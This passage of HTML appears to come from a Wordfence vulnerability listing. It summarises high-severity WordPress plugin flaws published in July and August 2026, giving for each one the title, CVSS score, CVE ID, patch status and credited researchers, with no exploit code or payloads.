<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/23a73680-ed13-4250-95e8-2933403f54e6" target="_blank" rel="noopener">Eazy Plugin Manager &lt;= 4.4.1 &#8211; Authenticated (Subscriber+) Privilege Escalation via pos_get_option AJAX Action and admin/login REST Endpoint</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14328" target="_blank" rel="noopener noreferrer">							CVE-2026-14328						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/plugins-on-steroids" target="_blank" rel="noopener">Eazy Plugin Manager – Powerful Plugin Management Solution for WordPress</a> <span class="wfvr-software-slug">[plugins-on-steroids]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nia" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f136390468287a6e9b71b79fe2a17e76.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f136390468287a6e9b71b79fe2a17e76"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nia" target="_blank" rel="noopener">Nia</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/23a73680-ed13-4250-95e8-2933403f54e6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a929efaf-80a1-45c1-9426-6c5b45a66530" target="_blank" rel="noopener">Extra Checkout Options (addon for Extra Product Options &amp; Add-Ons for WooCommerce) &lt;= 2.3.2 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary File Upload in eco_save_settings</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14270" target="_blank" rel="noopener noreferrer">							CVE-2026-14270						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-tm-extra-checkout-options-addon" target="_blank" rel="noopener">Extra Checkout Options &#8211; addon for Extra Product Options plugin</a> <span class="wfvr-software-slug">[woocommerce-tm-extra-checkout-options-addon]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-hung" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/64a0165f9a088bbcf2fc9efe7719419b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="64a0165f9a088bbcf2fc9efe7719419b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-hung" target="_blank" rel="noopener">bashu</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a929efaf-80a1-45c1-9426-6c5b45a66530" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0867f6a6-17f6-48d3-8ef2-bf89f5b28b05" target="_blank" rel="noopener">FleekDash V2 &lt;= 2.6.2.2 &#8211; Missing Authorization to Authenticated (Subscriber+) Administrator Account Takeover via /users/{id} REST Endpoint</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14356" target="_blank" rel="noopener noreferrer">							CVE-2026-14356						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fleekdash" target="_blank" rel="noopener">FleekDash V2</a> <span class="wfvr-software-slug">[fleekdash]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anony-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/05c109de991b49e44631bb886e85be4f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="05c109de991b49e44631bb886e85be4f"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anony-2" target="_blank" rel="noopener">maru</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0867f6a6-17f6-48d3-8ef2-bf89f5b28b05" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d42b8856-e5d0-4122-98a4-8c959832b271" target="_blank" rel="noopener">Pronamic Pay &lt;= 10.1.0 &#8211; Authenticated (Subscriber+) Privilege Escalation via Gravity Forms &#8216;Update user role&#8217; Field</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16635" target="_blank" rel="noopener noreferrer">							CVE-2026-16635						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pronamic-ideal" target="_blank" rel="noopener">Pronamic Pay</a> <span class="wfvr-software-slug">[pronamic-ideal]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/afan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/890bcfbaf2c84c9c872bf1c027848673.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="890bcfbaf2c84c9c872bf1c027848673"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/afan" target="_blank" rel="noopener">Afan</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/moonge" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3134259fccb2cd11ac78ae74096b9b91.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3134259fccb2cd11ac78ae74096b9b91"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/moonge" target="_blank" rel="noopener">moonge</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d42b8856-e5d0-4122-98a4-8c959832b271" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4a64f840-8570-4f98-8b72-27bee1607fc2" target="_blank" rel="noopener">Realtyna Organic IDX plugin + WPL Real Estate &lt;= 5.3.0 &#8211; Authenticated (Subscriber+) Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16236" target="_blank" rel="noopener noreferrer">							CVE-2026-16236						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/real-estate-listing-realtyna-wpl" target="_blank" rel="noopener">Realtyna Organic IDX plugin + WPL Real Estate</a> <span class="wfvr-software-slug">[real-estate-listing-realtyna-wpl]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/son-van-mrs0x06" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/755c27bc10b9191ede88f572e832d542.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="755c27bc10b9191ede88f572e832d542"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/son-van-mrs0x06" target="_blank" rel="noopener">Son Van (mrs0x06)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4a64f840-8570-4f98-8b72-27bee1607fc2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/195f86a5-e3dc-4414-bbe3-dea312bf30a9" target="_blank" rel="noopener">Subscriptions for WooCommerce &lt;= 2.0.0 &#8211; Authenticated (Contributor+) Privilege Escalation via &#8216;_wps_plan_user_role&#8217; Membership Plan Meta</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15414" target="_blank" rel="noopener noreferrer">							CVE-2026-15414						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/subscriptions-for-woocommerce" target="_blank" rel="noopener">Subscriptions for WooCommerce</a> <span class="wfvr-software-slug">[subscriptions-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/195f86a5-e3dc-4414-bbe3-dea312bf30a9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/327a155c-7a7d-494d-94d1-f7e7ee8927f0" target="_blank" rel="noopener">Wholesale for WooCommerce &lt;= 2.0.5 &#8211; Authenticated (Author+) Privilege Escalation via &#8216;user_role_set&#8217; Parameter</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12144" target="_blank" rel="noopener noreferrer">							CVE-2026-12144						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-wholesale-pricing" target="_blank" rel="noopener">Wholesale for WooCommerce</a> <span class="wfvr-software-slug">[woo-wholesale-pricing]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chloe-chamberland" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9bf72594e071c28445ed7a1be0de1a23.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9bf72594e071c28445ed7a1be0de1a23"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chloe-chamberland" target="_blank" rel="noopener">Chloe Chamberland</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/327a155c-7a7d-494d-94d1-f7e7ee8927f0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4ad5ca1c-b8c3-42c0-8170-821ada826cbb" target="_blank" rel="noopener">WP Password Policy &lt;= 3.7.1 &#8211; Authenticated (Subscriber+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15992" target="_blank" rel="noopener noreferrer">							CVE-2026-15992						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/password-requirements" target="_blank" rel="noopener">WP Password Policy</a> <span class="wfvr-software-slug">[password-requirements]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zickzick2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bc0ca0683e2f48d801834cc849d05ed9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bc0ca0683e2f48d801834cc849d05ed9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zickzick2" target="_blank" rel="noopener">zickzick2</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4ad5ca1c-b8c3-42c0-8170-821ada826cbb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9d692aff-8bb2-45bb-9caf-bc33d3ed5b10" target="_blank" rel="noopener">Kali Forms &lt;= 2.4.20 &#8211; Unauthenticated Remote Code Execution via &#8216;thisPermalink&#8217; Field Parameter</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16144" target="_blank" rel="noopener noreferrer">							CVE-2026-16144						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms" target="_blank" rel="noopener">Kali Forms — Contact Form &amp; Drag-and-Drop Builder</a> <span class="wfvr-software-slug">[kali-forms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9d692aff-8bb2-45bb-9caf-bc33d3ed5b10" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb5c8cb3-df67-4f2c-869a-48e34f5619ff" target="_blank" rel="noopener">NEX-Forms &lt;= 9.2.3 &#8211;  Authenticated (Admin+) Arbitrary File Deletion via Path Traversal via &#8216;location&#8217; Parameter</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15450" target="_blank" rel="noopener noreferrer">							CVE-2026-15450						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/nex-forms-express-wp-form-builder" target="_blank" rel="noopener">NEX-Forms – Ultimate Forms Plugin for WordPress</a> <span class="wfvr-software-slug">[nex-forms-express-wp-form-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb5c8cb3-df67-4f2c-869a-48e34f5619ff" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9b00da60-7d2d-467e-ab58-0bb4af0cbda5" target="_blank" rel="noopener">Bit integrations &lt;= 2.9.0 &#8211; Unauthenticated Arbitrary File Read via Optional CF7 File Field</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15006" target="_blank" rel="noopener noreferrer">							CVE-2026-15006						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bit-integrations" target="_blank" rel="noopener">Bit integrations – Form Integration, Webhook, Spreadsheets, CRM, LMS &amp; Email Automation</a> <span class="wfvr-software-slug">[bit-integrations]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9b00da60-7d2d-467e-ab58-0bb4af0cbda5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/467dd833-2f47-43cd-8d13-dffdad394b3c" target="_blank" rel="noopener">BuddyPress &lt;= 14.5.0 &#8211; Authenticated (Subscriber+) PHP Object Injection via XProfile Field Data</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-1360" target="_blank" rel="noopener noreferrer">							CVE-2026-1360						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/buddypress" target="_blank" rel="noopener">BuddyPress</a> <span class="wfvr-software-slug">[buddypress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vincent-theriault-laine" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d996746957e68308f3af4295949d729c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d996746957e68308f3af4295949d729c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vincent-theriault-laine" target="_blank" rel="noopener">Vincent Theriault-Laine</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/467dd833-2f47-43cd-8d13-dffdad394b3c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7ea72320-0e1e-45e3-987d-9ab7eecf1aee" target="_blank" rel="noopener">CubeWP Framework &lt;= 1.1.30 &#8211; Unauthenticated Arbitrary File Read via prev_icon/next_icon Parameter</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13339" target="_blank" rel="noopener noreferrer">							CVE-2026-13339						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cubewp-framework" target="_blank" rel="noopener">CubeWP Framework</a> <span class="wfvr-software-slug">[cubewp-framework]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nhien-pham-nhienit" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/dd648f7d75a7e7a46d7d82c57b085613.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dd648f7d75a7e7a46d7d82c57b085613"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nhien-pham-nhienit" target="_blank" rel="noopener">Nhien Pham (nhienit)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7ea72320-0e1e-45e3-987d-9ab7eecf1aee" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/eb0bbf47-a8c7-489d-a758-7b5771c2fcbd" target="_blank" rel="noopener">Export User Data &lt;= 2.2.6 &#8211; Authenticated (Subscriber+) PHP Object Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65552" target="_blank" rel="noopener noreferrer">							CVE-2026-65552						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
